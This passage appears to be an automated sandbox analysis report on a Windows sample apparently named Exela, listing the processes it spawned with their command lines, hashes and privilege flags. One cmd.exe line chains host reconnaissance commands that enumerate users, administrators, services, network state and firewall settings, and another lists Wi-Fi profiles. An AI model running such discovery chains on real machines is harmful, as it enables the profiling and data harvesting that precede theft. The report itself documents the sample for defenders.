                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:50
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:51
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                                                                                                                                                                                                                                                          Imagebase:0x7ff621f70000
                                                                                                                                                                                                                                                          File size:289'792 bytes
                                                                                                                                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:52
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:53
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:54
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:systeminfo
                                                                                                                                                                                                                                                          Imagebase:0x7ff6aad50000
                                                                                                                                                                                                                                                          File size:110'080 bytes
                                                                                                                                                                                                                                                          MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:55
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                                          Imagebase:0x7ff762f20000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:56
                                                                                                                                                                                                                                                          Start time:19:24:06
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                          Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                                          File size:496'640 bytes
                                                                                                                                                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:57
                                                                                                                                                                                                                                                          Start time:19:24:07
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:hostname
                                                                                                                                                                                                                                                          Imagebase:0x7ff69cd20000
                                                                                                                                                                                                                                                          File size:14'848 bytes
                                                                                                                                                                                                                                                          MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:58
                                                                                                                                                                                                                                                          Start time:19:24:07
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:59
                                                                                                                                                                                                                                                          Start time:19:24:08
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                          Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                          File size:55'320 bytes
                                                                                                                                                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Target ID:60
                                                                                                                                                                                                                                                          Start time:19:24:08
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user
                                                                                                                                                                                                                                                          Imagebase:0x7ff66c7c0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:61
                                                                                                                                                                                                                                                          Start time:19:24:08
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                                          Imagebase:0x7ff760020000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:62
                                                                                                                                                                                                                                                          Start time:19:24:08
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:query user
                                                                                                                                                                                                                                                          Imagebase:0x7ff7cf070000
                                                                                                                                                                                                                                                          File size:17'408 bytes
                                                                                                                                                                                                                                                          MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:63
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff724ef0000
                                                                                                                                                                                                                                                          File size:25'600 bytes
                                                                                                                                                                                                                                                          MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:64
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff66c7c0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:65
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                                                                                                                          Imagebase:0x7ff760020000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:66
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff66c7c0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:67
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 localgroup administrators
                                                                                                                                                                                                                                                          Imagebase:0x7ff760020000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:68
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff66c7c0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:69
                                                                                                                                                                                                                                                          Start time:19:24:09
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user guest
                                                                                                                                                                                                                                                          Imagebase:0x7ff760020000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:70
                                                                                                                                                                                                                                                          Start time:19:24:10
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:net user administrator
                                                                                                                                                                                                                                                          Imagebase:0x7ff66c7c0000
                                                                                                                                                                                                                                                          File size:59'904 bytes
                                                                                                                                                                                                                                                          MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:71
                                                                                                                                                                                                                                                          Start time:19:24:10
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\net1 user administrator
                                                                                                                                                                                                                                                          Imagebase:0x7ff760020000
                                                                                                                                                                                                                                                          File size:183'808 bytes
                                                                                                                                                                                                                                                          MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:72
                                                                                                                                                                                                                                                          Start time:19:24:10
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:wmic startup get caption,command
                                                                                                                                                                                                                                                          Imagebase:0x7ff7f9cd0000
                                                                                                                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:73
                                                                                                                                                                                                                                                          Start time:19:24:10
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:tasklist /svc
                                                                                                                                                                                                                                                          Imagebase:0x7ff64f8b0000
                                                                                                                                                                                                                                                          File size:106'496 bytes
                                                                                                                                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:74
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:ipconfig /all
                                                                                                                                                                                                                                                          Imagebase:0x7ff7152f0000
                                                                                                                                                                                                                                                          File size:35'840 bytes
                                                                                                                                                                                                                                                          MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:75
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ROUTE.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:route print
                                                                                                                                                                                                                                                          Imagebase:0x7ff63f270000
                                                                                                                                                                                                                                                          File size:24'576 bytes
                                                                                                                                                                                                                                                          MD5 hash:3C97E63423E527BA8381E81CBA00B8CD
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:76
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\ARP.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:arp -a
                                                                                                                                                                                                                                                          Imagebase:0x7ff634f30000
                                                                                                                                                                                                                                                          File size:26'624 bytes
                                                                                                                                                                                                                                                          MD5 hash:2AF1B2C042B83437A4BE82B19749FA98
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:77
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\NETSTAT.EXE
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netstat -ano
                                                                                                                                                                                                                                                          Imagebase:0x7ff7b0ea0000
                                                                                                                                                                                                                                                          File size:39'936 bytes
                                                                                                                                                                                                                                                          MD5 hash:7FDDD6681EA81CE26E64452336F479E6
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:78
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:sc query type= service state= all
                                                                                                                                                                                                                                                          Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                          File size:72'192 bytes
                                                                                                                                                                                                                                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:79
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh firewall show state
                                                                                                                                                                                                                                                          Imagebase:0x7ff762f20000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:80
                                                                                                                                                                                                                                                          Start time:19:24:11
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:netsh firewall show config
                                                                                                                                                                                                                                                          Imagebase:0x7ff762f20000
                                                                                                                                                                                                                                                          File size:96'768 bytes
                                                                                                                                                                                                                                                          MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:81
                                                                                                                                                                                                                                                          Start time:19:24:12
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
                                                                                                                                                                                                                                                          Imagebase:0x7ff6e3a60000
                                                                                                                                                                                                                                                          File size:11'317'024 bytes
                                                                                                                                                                                                                                                          MD5 hash:D53E9B9D10AFFCF90E613ABCCC702CA2
                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                          • Detection: 39%, ReversingLabs
                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                          Target ID:86
                                                                                                                                                                                                                                                          Start time:19:24:15
                                                                                                                                                                                                                                                          Start date:24/04/2024
                                                                                                                                                                                                                                                          Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                          Wow64 process (32bit):
                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                          Imagebase:
                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                          Has elevated privileges:
                                                                                                                                                                                                                                                          Has administrator privileges:
                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:10.6%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:20.9%
                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                            Total number of Limit Nodes:48
